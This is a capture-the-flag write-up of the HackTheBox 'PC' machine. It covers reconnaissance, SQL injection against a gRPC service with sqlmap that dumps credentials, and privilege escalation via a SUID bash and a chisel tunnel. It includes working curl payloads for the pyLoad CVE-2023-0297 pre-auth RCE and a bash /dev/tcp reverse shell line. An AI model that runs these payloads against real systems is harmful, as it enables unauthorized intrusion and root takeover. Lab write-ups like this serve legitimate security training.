PC
HackTheBox PC writeup by Thamizhiniyan C S
Overview
Greetings everyone,
In this write-up, we will tackle PC from HackTheBox.
Machine link: PC
Difficulty Level: Easy
Let's Begin 🙌
Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB. Click Here to learn more about how to connect to VPN and access the boxes.
Once connected to the VPN service, click on "Join Machine" to access the machine's IP.
Upon joining the machine, you will be able to view the IP address of the target machine.
Reconnaissance
Rustscan
rustscan -a 10.10.11.214
Nmap Agressive Scan
nmap -A -T4 -p 22,50051 -Pn <IP>
Results
From the results of rustscan, we can see that two ports are open. One is SSH and the other is unknown.
22
SSH
OpenSSH 8.2p1
50051
-
-
Information Gathering - Port 50051
If we take a look at port 50051, it returns some data, which is unrecognised. On further research about port 50051, found the following: https://grpc.io/. Port 50051 , is running the gRPC service, a Remote Procedure Call (RPC) framework developed by google.
On further looking out for exploits for this service, I found this writeup:
from which I found the following tool:
After installing the tool, run the following command: grpcui -plaintext 10.10.11.214:50051
And also from the above write-up, I inferred that this service might be vulnerable to SQL Injection.
Initial Access
Now visit the grpcui Web UI hosted at [http://127.0.0.1:43021](http://127.0.0.1:43021) [ Note: The port number might differ in your case ]
We can see that the gRPC service is a SimpleApp with register, login and getinfo features.
I first registered a new user.
username: something
password: something
Successfully created a user with the name something
Next I tried to login with the created user.
Successfully logged in!!! We got the id and the token for the user something. Note the id and token.
Now I tried the getinfo feature. I used the id and token that we noted in the previous step.
My Request was successful, but there was no details in the response, instead it was an empty object.
Now we are able to successfully send request to the getInfo feature. The id value in the getinfo tab might be vulnerable to SQL injection. So I again tried the getInfo function, but this time I captured the request with burpsuite and I saved the request as a file.
sqlmap
Now using the saved request file, I used sqlmap to check out for SQL Injection using the following command:
sqlmap -r request --flush-session --threads 10 --batch -p id --level 3 --risk 3
// Here:
// --flush-session : optional command, Flush session files for current target
// --threads : to mention the number of threads to be utilized
// --batch : Never ask for user input, use the default behavior
// --level : Level of tests to perform (1-5, default 1)
// --risk : Risk of tests to perform (1-3, default 1)
// -p : to specify the Testable parameter(s)
From the output of sqlmap, we can see that the id parameter is vulnerable to SQL Injection and from the output we can see that the database used by the gRPC service is sqlite.
Now we can dump the database using the following command:
sqlmap -r request --flush-session --threads 10 --batch -p id --level 3 --risk 3 --dump
// Here:
// --flush-session : optional command, Flush session files for current target
// --threads : to mention the number of threads to be utilized
// --batch : Never ask for user input, use the default behavior
// --level : Level of tests to perform (1-5, default 1)
// --risk : Risk of tests to perform (1-3, default 1)
// -p : to specify the Testable parameter(s)
// --dump : Dump DBMS database table entries
From the results of sqlmap, we have found a new credential:
username: sau
password: HereIsYourPassWord1431
I tried to login via SSH using the above credentials and got in.
Getting the User Flag
I listed out the current directory and found the user flag.
And also, in the current directory, found the following tools:
chisel - A fast TCP tunnel over HTTP.
linpeas.sh - it is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts.
Privilege Escalation
I first ran [linpeas.sh](http://linpeas.sh) , looking out for privilege escalation vectors.
Method 1
From the output of linpeas.sh, we can see that the /usr/bin/bash has a SUID bit set on it.
If you check GTFObins https://gtfobins.github.io/gtfobins/bash/#suid , we can use the command bash -p to escalate our privileges as root.
We have successfully escalated our privileges.
Method 2
From the output of linpeas.sh, we can see that a service is running on port 8000 locally on the target machine.
We can use chisel to create a proxy/tunnel to access this service on our local machine/attack box.
To do that we have to have the same version of chisel on both attacking and target machine.
First lets check the chisel version available in the target machine.
The target machine has chisel version 1.8.1.
Download the same version of chisel on your attacking machine.
Now from the attacking machine run the following command to create the chisel sever:
chisel server -p 9001 --reverse
Next on the target machine run the following command to setup the client and also to port forward the internal service:
chisel client <HTB_tunnel_IP>:9001 R:5000:localhost:8000
Once you run the above command, if you check the server, you can see that the connection is established.
Now in the attack machine, go to localhost:5000 to take a look at the service running on the target machine.
You can see that, pyload is running on the target machine on port 8000 internally.
From another terminal, I logged in via SSH to the target machine as sau to check the version of pyload running.
The version of pyload running is 0.5.0. On searching exploits for this version of payload, found the following website: https://github.com/bAuh0lz/CVE-2023-0297_Pre-auth_RCE_in_pyLoad , which showcased the RCE vulnerability on this version of pyload.
We have found the exploit. Now we can modify it to our needs and run the exploit.
First we are going to create a [reverse.sh](http://reverse.sh) shell file on the target machine in any directory, in this case we are using the /tmp directory. To do this run the following modified exploit:
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/rev.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://127.0.0.1:5000/flash/addcrypted2'
// Commands are URL encodedIf we run the above exploit, we can see that an error is thrown.
But if we open another terminal and login to the target machine via SSH as sau and check the /tmp directory we can see that a rev.sh file is created with root permissions.
Now we have to provide permissions to all the users to read, write and execute, since the owner of the file is root. To do this use the following exploit:
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"chmod%20777%20/tmp/rev.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://127.0.0.1:5000/flash/addcrypted2'
// Commands are URL encodedAfter executing the above command, if check the file permissions of the [rev.sh](http://rev.sh) file, you can see that all users have all permissions.
Now we can edit the [rev.sh](http://rev.sh) file. Add the following content to the rev.sh file to create a reverse shell.
#! /bin/bash
bash -i >& /dev/tcp/<HTB_tunnel_IP>/9002 0>&1
Don’t try to execute the reverse shell from the target machine, as you will get the reverse shell only with the privileges of sau , as the rev.sh file is executed by that user.
Before executing the reverse shell, start a netcat listener on the attacking machine.
Now run the following command to execute the reverse shell as root:
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"/tmp/rev.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://127.0.0.1:5000/flash/addcrypted2'
// Commands are URL encoded
After executing the above command, check the netcat listener that you created.
We have successfully obtained the reverse shell with root privileges.
Getting the Root Flag
And we have successfully obtained the root flag.
Thank You……
Last updated
Was this helpful?